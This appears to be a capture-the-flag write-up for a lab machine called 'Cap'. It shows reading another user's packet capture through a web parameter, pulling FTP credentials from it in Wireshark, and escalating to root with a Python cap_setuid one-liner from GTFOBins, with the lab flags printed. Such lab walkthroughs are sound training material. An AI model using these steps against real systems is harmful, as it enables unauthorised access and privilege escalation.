Cap
TARGET IP: 10.10.10.245
HOST IP: 10.10.16.3
RECON
WEBSITE
http://[TARGET IP]
Looks like a data analytics page that I am currently signed into as
Nathan.The dropdown menu page under the user doesn't do anything. All of the buttons including the
Logoutdon't point towards anything or do anything.Take a look at the source code:
<!-- offset area start -->
<div class="offset-area">
<div class="offset-close"><i class="ti-close"></i></div>
<ul class="nav offset-menu-tab">
<li><a class="active" data-toggle="tab" href="#activity">Activity</a></li>
<li><a data-toggle="tab" href="#settings">Settings</a></li>
</ul>
<div id="activity" class="tab-pane fade in show active">
<div class="recent-activity">
<div class="timeline-task">
<div class="icon bg1">
<i class="fa fa-envelope"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-check"></i>
</div>
<div class="tm-title">
<h4>Added</h4>
<span class="time"><i class="ti-time"></i>7 Minutes Ago</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-exclamation-triangle"></i>
</div>
<div class="tm-title">
<h4>You missed you Password!</h4>
<span class="time"><i class="ti-time"></i>09:20 Am</span>
</div>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="fa fa-bomb"></i>
</div>
<div class="tm-title">
<h4>Member waiting for you Attention</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="ti-signal"></i>
</div>
<div class="tm-title">
<h4>You Added Kaji Patha few minutes ago</h4>
<span class="time"><i class="ti-time"></i>01 minutes ago</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg1">
<i class="fa fa-envelope"></i>
</div>
<div class="tm-title">
<h4>Ratul Hamba sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Hello sir , where are you, i am egerly waiting for you.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-exclamation-triangle"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-exclamation-triangle"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="fa fa-bomb"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="ti-signal"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
</div>
</div>
<div id="settings" class="tab-pane fade">
<div class="offset-settings">
<h4>General Settings</h4>
<div class="settings-list">
<div class="s-settings">
<div class="s-sw-title">
<h5>Notifications</h5>
<div class="s-swtich">
<input type="checkbox" id="switch1" />
<label for="switch1">Toggle</label>
</div>
</div>
<p>Keep it 'On' When you want to get all the notification.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Show recent activity</h5>
<div class="s-swtich">
<input type="checkbox" id="switch2" />
<label for="switch2">Toggle</label>
</div>
</div>
<p>The for attribute is necessary to bind our custom checkbox with the input.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Show your emails</h5>
<div class="s-swtich">
<input type="checkbox" id="switch3" />
<label for="switch3">Toggle</label>
</div>
</div>
<p>Show email so that easily find you.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Show Task statistics</h5>
<div class="s-swtich">
<input type="checkbox" id="switch4" />
<label for="switch4">Toggle</label>
</div>
</div>
<p>The for attribute is necessary to bind our custom checkbox with the input.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Notifications</h5>
<div class="s-swtich">
<input type="checkbox" id="switch5" />
<label for="switch5">Toggle</label>
</div>
</div>
<p>Use checkboxes when looking for yes or no answers.</p>
</div>
</div>
</div>
</div>
</div>
</div>There is a lot there but it looks like we have some new information:
We have a user named
Nathanand possibly other usersRashed,Kaji Patha, andRatul Hamba.
Checking out
curldoesn't give us the version number of thegunicornweb server.
curl [TARGET IP] -sI
If we go to the home tab in the upper right and click on
Network Status, we get some really good info about the machine without actually having to run an NMAP scan.Looks like Ports 21, 22, and 80 are open.
When I try something in the search bar, nothing pops up but a parameter is added to the URL.
http://[TARGET IP]/?search=[SEARCHED WORD]#I captured a packet with Burpsuite and received the following.
Let's try the
Security Snapshotbutton. This appears to grab some packet data over a 5 second period and creates apcapfile to look at.We can also see that the URL shows a
dataparameter that after first use equals 1 and sequentially goes up. Let's set the parameter to0and see what it spits out. We'll also grab thepcapfile from it.
http://[TARGET IP]/data/0
We can open this
pcapfile in wireshark to take a look at it and see if we can find any good information.
WiresharkScanning through the Wireshark capture, we quickly find FTP credentials for the User
Nathan.
nathan:Buck3tH4TF0RM3!We can now log into
nathan's account, list out the current working directory, and download the user flag.
ftp [TARGET IP]
nathan
Buck3tH4TF0RM3!
ls -la
get user.txt
On our host system we can then look into the text file for the first flag.
cat user.txt
user.txt: 1f896817980ce9dfee4c79c1922c5ae3WAPPALYZER
The backend Language appears to be Python
Utilizes Gunicorn as a webserver
The Gunicorn "Green Unicorn" is a Python Web Server Gateway Interface HTTP server. It is a pre-fork worker model, ported from Ruby's Unicorn project. The Gunicorn server is broadly compatible with a number of web frameworks, simply implemented, light on server resources, and fairly fast.
NMAP
nmap [Target IP]
nmap -A -Sv -p 21,22,80 [TARGET IP]
sudo nmap [TARGET IP] -sS -sV --script http-headers -p 80
ENUMERATION
GOBUSTER
SUBDOMAIN
gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt
None of these are new to me and don't provide any new information.
gobuster vhost -u http://[TARGET IP]/ -w /usr/share/dirb/wordlists/common.txt
TARGET ENUMERATION
Now that we have credentials for
nathan. We can spend some time exploring the target system for possible privilege escalation.I'm going to use the credentials to log in through
SSH.
ssh nathan@[TARGET IP]
yes
Buck3tH4TF0RM3!
Try checking out what sudo privileges we have.
sudo -l
Buck3tH4TF0RM3!
Unfortunately, we have none so let's go digging around.
I spent some time digging around myself but didn't find anything. I decided to upload a copy of linpeas to the target account and perform some auto enumeration to help out.
I came across something interesting.
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eipI can verify the capability functions with the following command. This essentially allows for certain processes to have root privleges. Similar to SUID.
getcap -r / 2>/dev/null
This is great information as having the capabilities for
cap_setuidset is a particularly vulnerable situation.Hacktricks and GTFOBins both have sections for exploiting this for privilege escalation.
Let's go with the privilege escalation from GTFOBins.
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
And now I have root privileges.
Let's go get the root flag.
cat /root/root.txt
ca9be49e3fbed8b6be99a27bcd9be60fLast updated